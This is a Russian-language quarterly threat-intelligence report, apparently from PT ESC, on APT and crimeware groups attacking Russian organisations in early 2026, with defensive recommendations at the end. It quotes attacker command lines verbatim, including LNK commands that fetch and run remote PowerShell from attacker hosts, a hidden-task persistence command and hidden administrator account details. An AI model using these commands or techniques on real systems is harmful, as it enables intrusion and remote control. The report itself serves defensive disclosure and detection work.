Анализ активности хакерских группировок, I квартал 2026 г.

В I квартале 2026 года департамент Threat Intelligence PT ESC продолжил мониторинг активности хакерских группировок, нацеленных на российские организации. В рамках отчетного периода проводились сбор и верификация индикаторов компрометации, полученных по результатам расследований инцидентов, мониторинга активности хакерских группировок и последующего анализа образцов их вредоносного ПО.

По итогам квартала зафиксировано 808 уникальных образцов вредоносного ПО, ассоциированных с 11 отслеживаемыми группировками. Динамика уникальных образцов ВПО APT-группировок по кварталам продолжает восходящий тренд: Q1 2025 — 268, Q2 — 447, Q3 — 490, Q4 — 584, Q1 2026 — 808.

Распределение образцов между группировками остается неравномерным, наибольшее количество образцов приходится на Rare Werewolf — 179 экземпляров, что составляет около 22% от общего объема. Близкие показатели у PhaseShifters (165), PhantomCore (118) и Hive0117 (117). Следующая группа по активности — Goffee (67), IAmTheKing (49) и Tolik (44). Таким образом, четыре наиболее активных группировки суммарно обеспечили около 72% всех образцов.

Помесячная динамика показывает рост числа образцов к концу квартала: 117 образцов в январе, 283 в феврале и 408 в марте. Прирост в марте связан с активизацией нескольких группировок одновременно:

• PhaseShifters нарастила активность с единичных образцов в январе до 136 в марте;
• Hive0117 с нулевых значений в январе перешла к массовой кампании против бухгалтерий с 101 образцом в марте;
• Goffee увеличила количество образцов с 6 до 43.

На недельной шкале выделяется несколько одиночных пиков, характерных для таргетированных рассылок с ограниченным пулом получателей:

• PhantomCore — 65 образцов на неделе 16 февраля;
• Rare Werewolf — 42 образца на неделе 23 февраля;
• PhaseShifters — 66 образцов на неделе 23 марта.

После указанных пиков активность соответствующих группировок возвращалась к фоновым значениям. Помимо анализа активности самих группировок, в рамках мониторинга проводилась классификация атакуемых организаций по отраслевой принадлежности. По итогам I квартала 2026 года ключевой целью злоумышленников остается правительственный сектор, на который пришлось 17,86% всех зафиксированных атак. Сопоставимые доли приходятся на финансовый сектор и организации гражданского общества — по 9,82%, далее следуют производство (8,04%), технологические компании и розничная торговля (по 6,25%), энергетика (5,36%), а также транспорт, логистика и строительство (по 4,46%). Оставшиеся 27,68% распределены между прочими отраслями, что отражает широкий географический и отраслевой охват кампаний и отсутствие узкой специализации у большинства отслеживаемых группировок.

С учетом указанных тенденций в квартальной справке разобраны наиболее частые тактики, техники и процедуры (TTP), применявшиеся злоумышленниками в I квартале 2026 года, а также подробно описаны цепочки атак отслеживаемых группировок, классифицированных по двум основным направлениям — шпионаж и финансово мотивированные атаки. Завершает статью раздел с ключевыми выводами.

Больше информации об активности кибергруппировок можно получить на нашем портале PT Fusion.

В активности отслеживаемых группировок проявился ряд устойчивых и новых техник. Ниже приведены самые значимые из них, отсортированные от наиболее распространенных к менее используемым в отчетном периоде.

Фишинг по электронной почте оставался доминирующим вектором первоначального доступа и фиксировался у всех рассмотренных группировок. В отчетном периоде использовались разнообразные форматы контейнеров полезной нагрузки:

• документы Microsoft Word с макросами (IAmTheKing);
• запароленные архивы с LNK-ярлыками (PhantomCore, PhaseShifters);
• NSIS-инсталляторы с двойным расширением .pdf.exe (PhaseShifters);
• HTA-файлы (Tolik);
• RTF-документы с эксплуатацией OLE-объектов (BO Team);
• SFX-архивы и BAT-файлы (Hive0117, Fluffy Wolf);
• XLL-файлы Excel (Goffee).

Отдельно выделяется целевой фишинг на финансовые подразделения и бухгалтерии российских организаций: Hive0117 и Fluffy Wolf применяли типовые темы писем финансовой тематики («Акт сверки», «Счет на оплату», «Задолженность по оплате», «Акт сверки и претензия»). Рассылки велись с предположительно скомпрометированных почтовых ящиков, что повышало доверие получателей и позволяло обходить репутационные фильтры.

Планировщик задач Windows остается наиболее распространенным инструментом закрепления и используется практически всеми группировками:

• IAmTheKing — задача MicrosoftAppShd с интервалом запуска 10 минут;
• Hive0117 — задача автозапуска при первом запуске скрипта на JavaScript (далее — JS);
• Tolik — задача для регулярного запуска JS-скриптов через wscript.exe в паре с RunOnce;
• PhantomCore и Rare Werewolf — задачи запуска полезной нагрузки под именами легитимных процессов.

У PhantomCore и Rare Werewolf фиксируется техника «скрытых задач»: удаление значения SecurityDescriptor в ветках реестра HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks и удаление XML-файлов заданий из C:\Windows\System32\Tasks. В результате задача остается активной в сервисе Task Scheduler, но не отображается ни в графическом интерфейсе планировщика, ни в выводе schtasks /query.

Запуск полезной нагрузки через доверенные системные бинарные файлы используется всеми рассматриваемыми группировками. Штатные утилиты Windows (powershell.exe, wscript.exe, cscript.exe, mshta.exe, cmd.exe, schtasks.exe, wevtutil.exe, rundll32.exe) применяются в качестве интерпретаторов и загрузчиков на разных стадиях цепочки.

• У Tolik цепочка целиком строится вокруг wscript.exe и powershell.exe;
• IAmTheKing используют Internet Explorer через COM-объект для beacon-телеметрии ошибок доставки;
• Hive0117 используют связку cmd.exe → wscript.exe → powershell.exe, образуя ядро исполнения DarkWatchman.

В рассматриваемый период фиксировалось использование легитимных интернет-сервисов в качестве каналов управления и доставки полезной нагрузки.

Rare Werewolf перешла от эксфильтрации по SMTP через Blat к heartbeat-каналу через комментарии на странице GitHub Gist.

PhaseShifters хранила URL полезной нагрузки в репозитории Bitbucket, обновляя ссылки через коммиты; итоговая загрузка выполнялась с CDN johanclothing[.]shop.

Fluffy Wolf размещали архив с дроппером и промежуточные .txt-файлы с Base64-нагрузкой в репозитории GitHub (github.com/sergo20261), а также использовал Firebase Storage для хранения изображения со стеганографической Base64-нагрузкой.

PhantomCore размещала стейджеры на скомпрометированных легитимных сайтах. Подобный подход затрудняет блокировку на уровне сетевых фильтров, поскольку обращения направлены к доверенным доменам с валидными TLS-сертификатами.

В качестве вторичного механизма закрепления группировки используют ветки автозапуска в реестре и размещение .lnk-файлов в пользовательском каталоге автозагрузки.

Tolik применяет запись в RunOnce в связке с задачей планировщика.

Rare Werewolf и PhaseShifters размещают .lnk-файлы в каталоге %AppData%\Microsoft\Windows\Start Menu\Programs\Startup.

Отдельно стоит выделить использование реестра как бесфайлового хранилища конфигурации, команд и фрагментов полезной нагрузки. Само по себе такое хранение не обеспечивает автозапуск, но часто сочетается с Run/RunOnce-ключами или задачами планировщика, которые считывают данные из реестра и инициируют выполнение.

В отчетном периоде зафиксирована эксплуатация уязвимостей в клиентском ПО.

BO Team использовала CVE-2026-21509 в Microsoft Office для обхода встроенных средств защиты при обработке OLE-компонентов в RTF-документах, что позволяло инициировать загрузку LNK-ярлыка через WebDAV сразу после открытия документа.

Goffee эксплуатировала CVE-2025-6218 в RAR-архивах для запуска вредоносной цепочки при распаковке содержимого пользователем.

В отчетном периоде также была зафиксирована техника перехвата COM-объектов. PhantomCore создавала пользовательскую запись в HKCU\Software\Classes\CLSID для перехвата COM-класса и загрузки вредоносной DLL USOCachedData.dll в контексте легитимного процесса. Такую активность разумно рассматривать как гипотезу для обнаружения угроз и проверять в связке с другими индикаторами, так как подобные изменения могут встречаться и в легитимном ПО.

Техника Process Injection отмечалась у Fluffy Wolf: в январской кампании группировка использовала .NET-загрузчик AndeLoader, который запускал легитимный процесс MSBuild.exe и внедрял в его адресное пространство вредоносный код PureRat (PureHVNC).

Тенденция, обозначенная в отчете за IV квартал 2025 года, в I квартале 2026 года получила подтверждение на новых эпизодах.

У группы Goffee в атаках на российские оборонные предприятия зафиксированы модули с характерными для LLM-генерации признаками:

• избыточное комментирование на английском языке;
• шаблонные имена переменных (result, data, output);
• стандартные try/except-обертки.

Аналогичные признаки отмечены у Rare Werewolf в атаках на авиационную и радиопромышленность.

В марте специалисты киберразведки PT ESC зафиксировали кампанию группировки Rare Werewolf с использованием C#-дроппера, в результате работы которого на узле жертвы распаковывался архив data.zip с набором скриптов и легитимных утилит для скрытого интерактивного доступа через AnyDesk.

Дроппер (рис. 5) представляет собой исполняемый файл, содержащий в теле зашифрованный массив байтов и логику его восстановления до ZIP-архива. Расшифровка выполняется в два этапа. На первом этапе массив байтов обрабатывается операцией XOR с ключом длиной 8 байт. На втором этапе в результирующем массиве выполняется поиск заголовка ZIP-архива, после чего байт заголовка, отвечающий за метод сжатия, переустанавливается в значение Deflate. Все действия выполняются во временной директории, туда же в файл ghost_trace.log записываются журналы работы дроппера.

Результатом работы дроппера является архив data.zip, содержащий следующий набор файлов:

• структура компании1111.docx — документ-приманка (рис. 6);
• any_svc.exe — исполняемый файл AnyDesk;
• svc.conf — файл конфигурации AnyDesk;
• hider.exe — исполняемый файл утилиты NirCmd;
• run.bat — пакетный файл, инициирующий выполнение цепочки;
• clean.ps1, deploy.ps1, monitor.ps1 — PowerShell-скрипты цепочки заражения.

Выполнение цепочки инициируется запуском run.bat и состоит из трех этапов, реализованных в соответствующих PowerShell-скриптах.

Скрипт clean.ps1 (рис. 7):

• выполняет удаление ранее установленных экземпляров AnyDesk на узле жертвы;
• останавливает процессы с именем, соответствующим шаблону AnyDesk*;
• удаляет файлы из стандартных путей установки в %APPDATA%, %LOCALAPPDATA% и %ProgramData%;
• удаляет соответствующие ключи реестра.

После очистки выполняется скрипт deploy.ps1, реализующий следующие действия (рис. 8):

• подготовка рабочей директории %LOCALAPPDATA%\GhostExt и размещение в ней файлов конфигурации AnyDesk;
• установка прав доступа ReadOnly на файлы конфигурации;
• запуск исполняемых файлов any_svc.exe и hider.exe;
• получение идентификатора AnyDesk командой --get-id;
• отправка полученного идентификатора в виде heartbeat-запроса на страницу Gist на GitHub через API — api.github.com/gists/<gist-id>/comments;
• создание LNK-файла SystemCheck.lnk в папке автозагрузки пользователя для закрепления скрипта monitor.ps1.

Пример содержимого Gist-страницы с комментариями жертв приведен ниже.

Скрипт monitor.ps1 обеспечивает постоянное сокрытие окон процессов any_svc.exe и AnyDesk.exe с использованием команд NirCmd. В случае отсутствия процесса any_svc.exe скрипт перезапускает его через hider.exe. Дополнительно monitor.ps1 выполняет автоматическое нажатие кнопок в окнах с заголовками «Оповещение системы безопасности», то есть в окнах уведомлений брандмауэра Windows. Заголовки окон заданы на трех языках — русском, английском и украинском (рис. 10).

Эта кампания существенно отличается от активностей Rare Werewolf, зафиксированных нами прежде: ранние цепочки строились на запароленных архивах с универсальными легендами (оплата, договоры, акты, закупочная документация), внутри которых размещался единственный исполняемый файл; после запуска он развертывал AnyDesk, а конфигурационные данные AnyDesk из профиля пользователя и ProgramData эксфильтровались на SMTP-сервер злоумышленников через консольную утилиту Blat.

В мартовской кампании 2026 года наблюдаются следующие изменения:

• Канал управления. Вместо эксфильтрации по SMTP через Blat реализован heartbeat-канал через комментарии на странице GitHub Gist.
• Доставка полезной нагрузки. Вместо прямого размещения всех компонентов в архиве из письма используется C#-дроппер, внутри которого содержится архив.
• Подготовка среды. Добавлен этап принудительного удаления ранее установленных экземпляров AnyDesk.
• Активное сокрытие на узле. Вместо разового закрепления в автозагрузке добавлен скрипт monitor.ps1, который в бесконечном цикле скрывает окна процессов any_svc.exe и AnyDesk.exe через NirCmd, при необходимости перезапускает any_svc.exe.

В рассматриваемый период была зафиксирована фишинговая кампания группировки PhaseShifters, нацеленная на организации авиационной промышленности и оборонно-промышленного комплекса. Рассылка осуществлялась с подменного адреса, имитирующего сотрудника предприятия — производителя двигателей; письмо содержало запароленный архив с конструкторской документацией якобы по беспилотному летательному аппарату.

Внутри архива размещался исполняемый файл с двойным расширением .pdf.exe, представляющий собой NSIS-установщик. При запуске он размещает в каталоге автозагрузки файл sethc.exe и инициирует его выполнение через PowerShell в скрытом режиме.

Файл sethc.exe также является NSIS-установщиком. В нем выполняется команда PowerShell с двумя уровнями Base64-кодирования. Декодированная команда выполняет следующие действия:

• создает локальную учетную запись Adm с паролем Zxcasdqwe123 и добавляет ее в группу администраторов (попытка добавления выполняется как для англоязычной, так и для русскоязычной локализации);
• прописывает учетную запись Adm в ветку реестра HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList со значением 0, скрывая ее с экрана входа;
• отключает политику выполнения PowerShell (Set-ExecutionPolicy Unrestricted) и принудительно устанавливает протокол TLS;
• загружает и выполняет в памяти следующую стадию через Invoke-RestMethod или Invoke-Expression с домена dnot.sh.

Числовые значения (UID учетной записи, идентификатор протокола TLS, длительность задержки) рассчитываются через побитовые XOR-выражения для затруднения сигнатурного детектирования. Фрагмент NSIS-скрипта с Base64-командой приведен ниже.

Параллельно из установщика запускается компонент tmum.exe, выполняющий распаковку второй стадии:

powershell.exe -ExecutionPolicy Bypass -Command
  "& { & $env:Temp\waf-waf.exe x -pStickyWerewolf -y -o$env:Temp $env:Temp\lr_1.7z }"

Архив lr_1.7z распаковывается утилитой waf-waf.exe (упаковщик 7-Zip), а в качестве пароля используется название группировки — StickyWerewolf.

Дополнительно в NSIS-скрипте установщика зафиксирована загрузка следующей стадии через библиотеку INetC: URL — bitbucket[.]org/[REDACTED]/raw/main/calc — содержит ссылку на CDN johanclothing[.]shop, откуда скачивается полезная нагрузка.

По истории коммитов в репозитории Bitbucket установлен адрес электронной почты автора — gitlabrador1488@proton[.]me. Содержимое коммитов представляет собой обновление URL-ссылки на полезную нагрузку в CDN johanclothing[.]shop.

По указанной CDN-ссылке загружается файл, имитирующий имя Telegram.exe. Файл упакован UPX; после распаковки представляет собой троян удаленного доступа Remcos.

Итоговая цепочка имеет следующий вид:

1. Фишинговое письмо.
2. Запароленный RAR-архив.
3. NSIS-установщик с двойным расширением.
4. Закрепление через sethc.exe в автозагрузке.
5. Создание скрытой административной учетной записи Adm.
6. Загрузка с Bitbucket.
7. CDN johanclothing[.]shop.
8. UPX-упакованный Remcos.

В середине февраля была зафиксирована фишинговая кампания группировки PhantomCore, нацеленная на организации в сферах проектно-конструкторских работ и грузовых перевозок. Рассылка осуществлялась по электронной почте; во вложении письма размещался запароленный архив, пароль передавался в теле сообщения. Пример письма приведен на скриншоте ниже.

Внутри архива размещалась стартовая полезная нагрузка в виде трех LNK-ярлыков с именами «карточка учета сведений», «проект договора» и «техническое задание». Каждому из ярлыков соответствует свой документ-приманка, открываемый параллельно с запуском вредоносной цепочки.

LNK-файлы в кампании однотипны и различаются только URL, по которому выполняется обращение за следующей стадией. При запуске ярлыка вызывается cmd.exe, который в скрытом режиме инициирует PowerShell, скачивает удаленный скрипт и исполняет его в памяти. Командная строка ярлыка имеет следующий вид:

/c FOR /f "tokens=4 delims=s\" %g in ('set^|findstr PSM') do cmd /c
for /f "tokens=*" %j in ("%g -WindowStyle Hidden -c (New-Object Net.WebClient)
.DownloadString('https://1cbit-dev.com/hardware/archive/alpha/get.html')")
do %g -WindowStyle Hidden "%j"

По указанному URL размещен стейджер, оформленный как HTML-страница с заглушкой UNDER CONSTRUCTION. При открытии в браузере страница не содержит видимого вредоносного контента, однако внутри тега <script> размещен PowerShell-код, выполняющий загрузку следующих стадий.

Стейджер выполняет следующие действия.

Через Net.WebClient загружает PDF-приманку с именем Proekt_dogovora_na_vypolnenie_rabot.pdf, сохраняет во временный каталог пользователя и сразу открывает. Параллельно загружает второй файл, замаскированный под текстовый документ, и сохраняет как C:\ProgramData\USOShared\USOCachedData.txt. Несмотря на расширение .txt, это PE-библиотека.

Далее через реестр формируется пользовательская COM-привязка: в ветке HKCU\Software\Classes\CLSID\{C53E07EC-25F3-4093-AA39-FC67EA22E99D}\InprocServer32 в значение (Default) подставляется путь к загруженной библиотеке.

Загруженная библиотека USOCachedData.dll реализует функциональность реверс-шелла. На старте имплант формирует уникальный идентификатор узла, после чего собирает первичные атрибуты окружения:

• имя узла;
• локальный IPv4-адрес;
• DNS-сервер;
• DNS-домен.

Эти данные агрегируются в JSON и отправляются в управляющую инфраструктуру по HTTPS как часть первичной регистрации. Далее имплант переходит в режим периодического опроса C2-сервера: при получении ответа с командой выполняет ее на узле и возвращает результат, после чего выдерживает паузу около 30 секунд и повторяет запрос на получение следующего задания.

Конструкция запуска полезной нагрузки с использованием LNK-файлов наблюдалась в более ранних операциях PhantomCore. Например, в январской кампании использовался ярлык «ТЗ на согласование сб 54 от 19.01.26.docx.lnk» со схожей командной строкой:

/c FOR /f "tokens=4 delims=s\" %g in ('set^|findstr PSM') do cmd /c
for /f "tokens=*" %j in ("%g -WindowStyle Hidden -c (New-Object Net.WebClient)
.DownloadString('https://metelkova.ru/wp-includes/post-template.html')")
do %g -WindowStyle Hidden "%j"

В январе рассылка была направлена на российские организации из сфер ЖКХ, финансов, городской инфраструктуры и муниципальных услуг, аэрокосмической отрасли, потребительских цифровых сервисов, химической промышленности, строительства, производства потребительских товаров, а также электронной коммерции и маркетплейсов. В качестве полезной нагрузки второй стадии в январской кампании вместо DLL применялось ВПО на PowerShell.

В I квартале 2026 года Goffee продолжила целевые фишинговые кампании против российских организаций. Основным вектором первоначального доступа оставалась рассылка ZIP- и RAR-архивов с вредоносными вложениями.

В исследуемых цепочках в качестве стартовой полезной нагрузки использовались BAT-скрипты, XLL-надстройки Excel и исполняемые файлы. Независимо от формата доставки, конечной полезной нагрузкой в большинстве случаев выступали версии бэкдора WarpPlugin; в отдельных цепочках — модифицированный агент Kharon.

В случае с RAR-архивом группировка эксплуатировала уязвимость CVE-2025-6218: при распаковке архива пользователем run.bat помещался в папку автозагрузки, чем обеспечивалось закрепление в системе. При последующем входе пользователя скрипт запускался и подтягивал следующую стадию цепочки со скомпрометированного легитимного ресурса — PowerShell-загрузчик, доставлявший WarpPlugin. В ряде кампаний для запуска BAT использовался LNK-файл, а PowerShell-скрипт попутно декодировал и открывал PDF-документ-приманку, размещённый в нём в Base64.

В течение рассматриваемого периода Goffee также использовала XLL-файлы в качестве контейнера первой стадии. Такие образцы совмещали в себе XLSX-приманку и код загрузчика. При открытии файла вызывалась экспортируемая функция xlAutoOpen, после чего на узле сохранялись компоненты вредоносной цепочки, выполнялось закрепление и запускалась следующая стадия.

Переход к XLL-формату позволял злоумышленникам имитировать открытие легитимной таблицы Excel и обходить средства защиты, ориентированные в первую очередь на макросы в офисных документах.

В феврале был зафиксирован еще один вариант доставки, в котором вместо XLL-файла в архиве распространялся исполняемый файл с графическим интерфейсом, имитирующим защищенный документ. Несмотря на изменение формы доставки, логика атаки в целом сохранялась: исполняемый файл использовался как оболочка для запуска очередной версии WarpPlugin.

После выполнения на узле WarpPlugin проводил первичный сбор сведений о системе и переходил к регулярному взаимодействию с управляющей инфраструктурой. Имплант передавал базовую информацию об узле и далее функционировал в режиме опроса C2-сервера с последующим исполнением поступающих команд.

В исследованных версиях поддерживались функции удалённого выполнения команд и передачи файлов, а в отдельных модификациях — дополнительные возможности, включая создание снимков экрана и кейлоггинг. Для закрепления использовались стандартные механизмы операционной системы — реестр и планировщик задач.

Активность Goffee в I квартале 2026 года характеризуется вариативностью форматов доставки при сохранении общей логики атаки:

• фишинговая рассылка;
• запуск стартовой стадии под видом легитимного файла;
• загрузка и закрепление импланта;
• последующий переход к удаленному управлению зараженным узлом.

Наиболее заметными изменениями в отчетном периоде стали расширение использования XLL-файлов, применение исполняемых приманок с графическим интерфейсом и появление отдельных цепочек с более сложной маскировкой полезной нагрузки.

Специалисты киберразведки PT ESC зафиксировали фишинговую кампанию группировки IAmTheKing, нацеленную на российские организации с использованием документов-приманок, оформленных под типовую кадровую форму «Личный листок по учету кадров». Рассылка осуществлялась по электронной почте.

При открытии документ отображал поверх шаблона анкеты поддельное окно Microsoft Office с сообщением «Этот файл был создан с помощью более новой версии Microsoft Office» и предложением нажать кнопку «Включить содержимое» для отображения данных. Такой прием социальной инженерии используется, чтобы побудить пользователя включить макросы, после чего на его устройстве запускается цепочка заражения.

После активации содержимого процесс WINWORD.EXE развертывает на диске три компонента первой стадии:

• %APPDATA%\Roaming\GmpQCrHeSpcUxedm.bat — пакетный файл, инициирующий выполнение цепочки;
• C:\ProgramData\WindowsAPPUpdate.ekr — XOR-зашифрованный массив байтов с PowerShell-нагрузкой; ключ расшифровки размещен в последней строке файла;
• %APPDATA%\Roaming\Microsoft\Office\Recent\ЛИЧНЫЙ ЛИСТОК ПО УЧЕТУ КАДРОВ.doc.lnk — артефакт открытия документа.

Выполнение цепочки инициируется запуском GmpQCrHeSpcUxedm.bat через cmd.exe, который, в свою очередь, запускает powershell.exe. PowerShell через cmd /c type C:\ProgramData\WindowsAPPUpdate.ekr считывает зашифрованный массив байтов, отделяет последнюю строку как XOR-ключ, расшифровывает основную полезную нагрузку и сохраняет ее на диск как C:\ProgramData\WindowsAPPUpdate.ps1.

Для закрепления на узле жертвы создается задача планировщика командой:

schtasks /create /tn MicrosoftAppShd /tr "powershell -ep bypass -w 1 -f c:\programdata\WindowsAPPUpdate.ps1" /sc minute /mo 10 /f

Задача обеспечивает запуск PowerShell-загрузчика каждые 10 минут с обходом политики выполнения и в скрытом окне. В отдельных запусках наблюдался также вариант с именем задачи MicrosoftAShd и интервалом в 1 минуту.

Расшифрованный скрипт WindowsAPPUpdate.ps1 реализует следующую функциональность:

• регистрирует политику TrustAllCertsPolicy, отключающую проверку TLS-сертификатов C2-сервера;
• компилирует C#-класс CredManager.Util для извлечения учетных данных прокси-сервера из Windows Credential Manager;
• определяет параметры прокси-сервера; при его наличии формирует объект PSCredential из извлеченных логина и пароля, в противном случае использует DefaultNetworkCredentials;
• с использованием подменного User-Agent загружает следующую стадию с управляющего сервера по адресу ssion.novetlylition.com:80, сохраняет ее как fktVNobv.ps1 и сразу исполняет;
• при ошибке загрузки активирует фолбэк-механизм: создает COM-объект InternetExplorer.Application в невидимом режиме, переходит на маяк-телеметрию ssion.novetlylition.com/ld-failed? id=<> и завершает процесс iexplore.exe. Такая конструкция позволяет операторам отслеживать неудачные попытки доставки полезной нагрузки.

Итоговая цепочка имеет следующий вид:

1. Фишинговое письмо с документом-приманкой кадровой тематики.
2. Открытие файла .doc в Microsoft Word и активация содержимого пользователем.
3. Сброс на диск стейджеров: GmpQCrHeSpcUxedm.bat, WindowsAPPUpdate.ekr.
4. Запуск BAT → PowerShell → расшифровка XOR-зашифрованного массива данных → WindowsAPPUpdate.ps1.
5. Закрепление через задачу планировщика MicrosoftAppShd с интервалом 10 минут.
6. Извлечение учетных данных прокси из Windows Credential Manager через CredReadW.
7. Загрузка следующей стадии с C2-сервера ssion.novetlylition.com и сохранение как fktVNobv.ps1.
8. При сбое — отправка телеметрии /ld-failed? id=<random> через скрытый Internet Explorer.

В конце марта специалисты группы киберразведки PT ESC зафиксировали кампанию группировки Tolik с использованием HTA-файлов.

Цепочка атаки начиналась с фишингового письма с архивом во вложении. После распаковки на узле жертвы оказывались четыре HTA-файла, каждый из которых выступал стартовым загрузчиком.

После запуска HTA извлекал и собирал содержимое из скрытых HTML-блоков, формировал из него исполняемый script-блок, а затем переходил к установочной логике: создавал рабочие директории в профиле пользователя, записывал в реестр конфигурацию и фрагменты следующих стадий, а также сохранял на диск JS-скрипты, использовавшиеся как локальные загрузчики.

Для закрепления применялись два механизма: запись в RunOnce и создание задачи планировщика, обеспечивавшей регулярный запуск скриптов через wscript.exe. Дальнейшее выполнение происходило уже через JS-лоадеры, которые считывали данные из веток HKCU\Software\… собирали код из нескольких частей, декодировали его и запускали в памяти.

Все четыре HTA-файла реализовывали одну и ту же логику и отличались в основном именами каталогов, веток реестра, dropped-файлов и служебными идентификаторами кампании.

Конфигурация во всех образцах содержала перечень пользовательских каталогов и расширений файлов, представляющих интерес для операторов:

• офисные документы: doc, docx, xls, xlsx, csv, rtf, odt, ods;
• PDF и текстовые файлы: pdf, txt;
• архивы: zip, rar, 7z, tar;
• изображения: jpg, jpeg, png, heic;
• инженерные и GIS/CAD-форматы: vsdx, vdx, cdr, kmz, kml, dwg, dxf;
• резервные копии и конфигурационные файлы: bak, ovpn, ldk, set.

По сравнению с предыдущими атаками Tolik основным изменением стал переход от VBS-скриптов к JS-скриптам. При этом общая архитектура сохранилась: HTA по-прежнему используется как стартовая стадия, основная логика и конфигурация выносятся в реестр, а закрепление выполняется через RunOnce и планировщик задач.

В феврале группа киберразведки PT ESC зафиксировала фишинговую кампанию группировки BO Team, в которой эксплуатировалась уязвимость CVE-2026-21509 в Microsoft Office. Кампания была направлена против российских организаций. В ходе нее распространялись RTF-документы, оформленные под служебную переписку федерального ведомства «АКТ проверки транспортного средства» с приложенной формой письменных пояснений по делу об административном правонарушении.

Внутри RTF-документа размещен OLE-объект с CLSID EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B (Shell.Explorer.1). Данные объекта упакованы в OLE-хранилище; в стриме CONTENTS находится специально сформированный LNK-ярлык, указывающий на удаленный ресурс:

\\rostransnadzor.digital@SSL\svn\58\АКТ проверки транспортного средства.lnk

Суффикс @SSL активирует WebDAV-редиректор Windows (службу WebClient), преобразуя обычное UNC-обращение в HTTPS-запрос к внешнему серверу. Уязвимость CVE-2026-21509 в этой цепочке выступает механизмом обхода встроенных средств защиты Microsoft Office при обработке OLE-компонентов: этот недостаток позволяет создать COM-объект и обратиться к удаленному LNK-ярлыку сразу после открытия документа, инициируя следующую стадию атаки.

На момент исследования удаленный LNK-ярлык уже был недоступен, поэтому полностью воспроизвести вторую стадию цепочки не удалось.

Принадлежность кампании к BO Team подтверждается следующими признаками. В SOA-записи домена rostransnadzor.digital в поле RNAME указан контактный электронный адрес gjegoshcappaniesh@gmail.com — тот же адрес использовался при регистрации доменов, ранее ассоциированных с BO Team.

Имя вредоносного файла «АКТ проверки транспортного средства» совпадает с именем образца, ранее классифицированного как BrockenDoor — основной бэкдор BO Team. В смежных рассылках использовался домен с символьным сдвигом — rostransnnadzor.ru (сдвоенная «н»).

В феврале-марте группа киберразведки PT ESC зафиксировала несколько волн масштабных вредоносных рассылок группировки Hive0117, нацеленных на бухгалтерии российских организаций из различных отраслей.

Рассылки осуществлялись с предположительно скомпрометированных почтовых ящиков; темы писем относились к финансам: «Задолженность по оплате», «Счет на оплату», «Акт сверки». Целевой аудиторией злоумышленников являлись специалисты финансовых департаментов. В марте частота и масштаб рассылок группы заметно возросли.

Вредоносный файл доставлялся в запароленном RAR-архиве; пароль передавался в теле письма — прием направлен на обход фильтров почтовых сервисов и антивирусных решений. Содержимое архива маскировалось под счета на оплату, акты сверок и накладные.

Внутри архива размещался исполняемый файл, название которого повторяло тему письма. Механика заражения принципиально не изменилась по сравнению с кампаниями, описанными в предыдущих квартальных отчетах:

• при запуске SCR-файл распаковывает PowerShell-кейлоггер и вредоносный скрипт JavaScript, после чего JS-код запускается через wscript.exe;
• для маскировки активности пользователю демонстрируется правдоподобное окно ошибки, тогда как вредоносный скрипт продолжает исполняться в фоновом режиме;
• при первом запуске создается задача на автозапуск в планировщике заданий и прописываются служебные параметры в реестре;
• для снижения вероятности детектирования скрипт добавляет себя в исключения Microsoft Defender и, при наличии административных прав, очищает точки восстановления;
• управляющая инфраструктура выбирается гибридно: сначала агент перебирает жестко заданный список стартовых доменов и кэширует «рабочий» домен в реестре, а при недоступности кэша переходит к генерации доменов через DGA-механизм и подбору пула валидных C2-серверов;
• кейлоггер хранится в реестре в XOR-кодировке и запускается тихим PowerShell-процессом в скрытом режиме с передачей полезного фрагмента в Base64 через powershell.exe, после чего JavaScript-код выгружает собранные нажатия на сервер управления.

В конце января группа киберразведки PT ESC зафиксировала вредоносную кампанию Fluffy Wolf, направленную на российские организации финансового сектора. Рассылка осуществлялась по электронной почте с темой «Акт сверки и претензия»; в теле письма указывалась ссылка на архив, размещенный в публичном репозитории GitHub.

Внутри архива размещался обфусцированный BAT-файл (pretenziya_27012026_akt_sverka_1C_PDF.bat), состоящий из большого числа SET-присвоений и GOTO-переходов между метками.

Функциональность скрипта сводится к декодированию закодированного в Base64 блока данных: перед декодированием в строке выполняется замена каждого вхождения подстроки h@ на d, после чего результат запускается через powershell.exe. Параллельно BAT-файл копирует себя в C:\ProgramData\avtoproxi.bat для последующего автозапуска.

Декодированные данные представляют собой PowerShell-скрипт, который выполняет загрузку изображения из одного из двух источников: Firebase Storage (firebasestorage.googleapis[.]com) или стороннего CDN (modaaura[.]store). Содержимое изображения парсится по тегам-маркерам BASE64_START и BASE64_END, между которыми размещен закодированный в Base64 .NET-загрузчик AndeLoader. AndeLoader скачивает исполняемый файл по URL, указывающему на .txt-файл в том же репозитории GitHub (vc27012026upload.txt), после чего запускает легитимный процесс MsBuild.exe и внедряет полученный код в его адресное пространство.

Конечной полезной нагрузкой выступает PureRat (PureHVNC) — троян удаленного доступа с функциональностью скрытого управления рабочим столом.

В репозитории sergo20261 обнаружены три связанных проекта (proxihost, proxi, text), содержащих значительное число вспомогательных файлов: Rust-загрузчики PureRat, исполняемые файлы PureRat, а также .txt-файлы с Base64-кодированными данными, используемые в качестве промежуточных стадий доставки полезной нагрузки.

Первый квартал 2026 года продолжает тренды, обозначенные в 2025 году:

• рост числа уникальных образцов;
• усложнение цепочек доставки;
• смещение фокуса на легитимные каналы коммуникации.

В качестве приоритетных направлений для организаций из зоны повышенного риска (промышленность, ОПК, госсектор, финансовый сектор) можно выделить следующие меры:

• детонация вложений из писем в песочнице с последующей блокировкой по результатам поведенческого анализа — как основная мера против LNK-ярлыков, HTA-файлов, SFX-архивов и BAT-скриптов;
• мониторинг дочерних процессов mshta.exe;
• мониторинг подозрительных дочерних процессов офисных приложений;
• мониторинг операций с SecurityDescriptor в ветках HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks и удаления XML-файлов заданий из C:\Windows\System32\Tasks — признак техники «скрытых задач»;
• профилирование обращений к внешним облачным сервисам (GitHub, GitHub Gist, Bitbucket, Firebase Storage, Telegraph, Pastebin): построение профиля обращений по отделам и выявление аномалий. Например, обращения к GitHub Gist с рабочей станции бухгалтера. Как массовое детектирующее правило мера подходит не всем из-за высокой фоновой активности и вероятности ложных срабатываний;
• аудит сервисных учетных записей подрядных организаций и ограничение их привилегий, контроль установки и использования легитимных утилит удаленного доступа (AnyDesk, UltraVNC).